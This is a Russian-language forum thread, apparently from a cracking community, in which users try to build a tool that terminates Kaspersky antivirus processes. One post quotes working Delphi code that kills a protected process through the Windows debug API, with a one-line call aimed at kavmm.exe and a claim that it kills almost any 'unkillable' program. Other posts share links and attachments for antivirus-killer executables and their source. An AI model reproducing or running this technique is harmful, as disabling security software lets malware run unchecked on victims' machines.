Собственно как?

Сразу хочу оговориться, что пишу не трой, а прогу которая должна:
1) гасить каспера
2) удалять 2 ветки реестра
3) запускать каспера.
вот с первым пунктом и возникла проблема.

На системные запросы он не отвечает, даже со всеми привилегиями.

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

habrahabr.ru/blog/infosecurity/29853.html

-----
Никогда не делай то, что возможно. Стремись сделать то что невозможно впринципе!

| Сообщение посчитали полезным:

GPcH
Спасибо за информацию, но ведь там говориться о отключении защиты, а мне нужно чтобы завершился процесс avp.exe

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

Spirit пишет:
Спасибо за информацию, но ведь там говориться о отключении защиты, а мне нужно чтобы завершился процесс avp.exe

Сорри не тот топик - читай выше. Просто как то на antimalvare натолкнулся на статью что выше.

-----
Никогда не делай то, что возможно. Стремись сделать то что невозможно впринципе!

| Сообщение посчитали полезным:

GPcH
Огромнейшее спасибо, узнал много нового и интересного.
Теперь вот появилась пища для раздумий, нафига я юзаю такой дырявый авер =)

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

Да я сам когда на эту статью наткнулся был не в восторге.
Хотя я этот авер и не юзаю.
Но в восьмерке обещают все исправить + ускорить работу за счет использования многопоточности.

-----
Никогда не делай то, что возможно. Стремись сделать то что невозможно впринципе!

| Сообщение посчитали полезным:

хзхз
Я ставил себе восьмерку альфа2, он у меня страшно тормозил систему и кидал БСОДы.
Так что пока не выйдет нормальный релиз я больше эксперементировать не буду.

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

вот прога она может гасить каспера....
где-то были исходники но я не могу найти

81cf_05.12.2007_CRACKLAB.rU.tgz - Killer.exe

| Сообщение посчитали полезным:

Spirit
Попробуй здесь посмотри. Я по этой статье убивал Касперского.
ТЫЦ http://www.wasm.ru/article.php?article=apihook_2

-----
The truth is out of there...

| Сообщение посчитали полезным:

Lumen
И у тебя получилось?
Я быстренько просмотрел код, вроде используются примитивные функции...

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

MS-Rem пишет:
Практическое применение:
Убиваем антивирус Касперского:
{ убивание процесса отладочным методом }
Function DebugKillProcess(ProcessId: dword): boolean;
var
pHandle: dword;
myPID: dword;
HandlesInfo: PSYSTEM_HANDLE_INFORMATION_EX;
r: dword;
begin
Result := false;
myPID := GetCurrentProcessId();
if not EnableDebugPrivilege() then Exit;
//подключаемся к системе отладки и получаем DebugObject
if DbgUiConnectToDbg() <> STATUS_SUCCESS then Exit;
pHandle := OpenProcessEx(ProcessId);
//включаем отладку процесса
if DbgUiDebugActiveProcess(pHandle) <> STATUS_SUCCESS then Exit;
//надо найти полученный DebugObject
HandlesInfo := GetInfoTable(SystemHandleInformation);
if HandlesInfo = nil then Exit;
for r := 0 to HandlesInfo^.NumberOfHandles do
if (HandlesInfo^.Information[r].ProcessId = myPID) and
(HandlesInfo^.Information[r].ObjectTypeNumber = $8) //DebugObject
then begin
//закрываем DebugObject, что приводит к уничтожению отлаживаемого процесса
CloseHandle(HandlesInfo^.Information[r].Handle);
Result := true;
break;
end;
VirtualFree(HandlesInfo, 0, MEM_RELEASE);
end;
После чего антивирус Касперского убивается одной строкой:

DebugKillProcess(GetProcessId('kavmm.exe'));

Также, этим методом можно убить почти любую программу, авторы которой заявляют, что она неубиваемая.

ЗЫ: Я правда не знаю, какая у тебя версия, но шестой каспер этим кодом убивается на ура...

-----
The truth is out of there...

| Сообщение посчитали полезным:

[del]

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

У кого нибудь есть это же код но на С++ , а то переводить, как -то не хочется изобретать велосипед если это уже кто-то сделал.

| Сообщение посчитали полезным:

Эх! Не сработало.
Гасит любые процессы, кроме кашперовского.

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

Если посмотреть сам источник ( rootkit.com/newsread.php?newsid=778 )
то там как я понял там сначало гасится csrss.exe а потом уже касперовский.

| Сообщение посчитали полезным:

гы
из csrss "достается" хпроцес касперского) а не гасится )

| Сообщение посчитали полезным:

undb пишет:
то там как я понял там сначало гасится csrss.exe

гасить csrss.exe - это сильно

| Сообщение посчитали полезным:

Gideon Vi пишет:
гасить csrss.exe - это сильно

Ну и что получиш ребут компа и после загрузки сообщение ,что система восстановленна после системной ошибки .Какое практическое применение ?

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

MACKLIA пишет:
Ну и что получиш ребут компа и после загрузки сообщение ,что система восстановленна после системной ошибки .Какое практическое применение ?

никакого - именно об этом я и сказал. неужели ирония столь незаметна?

| Сообщение посчитали полезным:

Magister Yoda пишет:
вот прога она может гасить каспера....
что-то не гаситься каспер ею. даже окно главное закрыть не может (правда манипуляции с ним делает).

| Сообщение посчитали полезным:

Lumen

Это очень старый код. Убивался только KAV 5.

Evol

Дык, тоько код с rootkits.com может что-то сделать, от остального у KAV\KIS защита уже есть!

| Сообщение посчитали полезным:

HellStudent пишет:
тоько код с rootkits.com может что-то сделать, от остального у KAV\KIS защита уже есть!
Это вы так думаете

-----
Research is my purpose

| Сообщение посчитали полезным:

Error_Log
Если у тебя есть идеи, пожалуйста поделись.
А то так хочется дописать прогу...

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

я так и не понял прога которую я оттачил не работает?

| Сообщение посчитали полезным:

Magister Yoda
мне не нужна твоя программа. мне нужен код.

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

если она работает то я постараюсь найти код

| Сообщение посчитали полезным:

Spirit пишет:
мне не нужна твоя программа. мне нужен код.

тыж реверсер, засунул в иду прогу и получил исходник на си

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

Hellspawn
Эмм...а что такое ида и что такое с++?
И еще вопрос, кто такой реверсер?

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

Эмм...новых идей так и не появилось?

-----
iNTERNATiONAL CoDE CReW

| Сообщение посчитали полезным:

вот нашёл

950f_07.12.2007_CRACKLAB.rU.tgz - killer-sources.rar

| Сообщение посчитали полезным: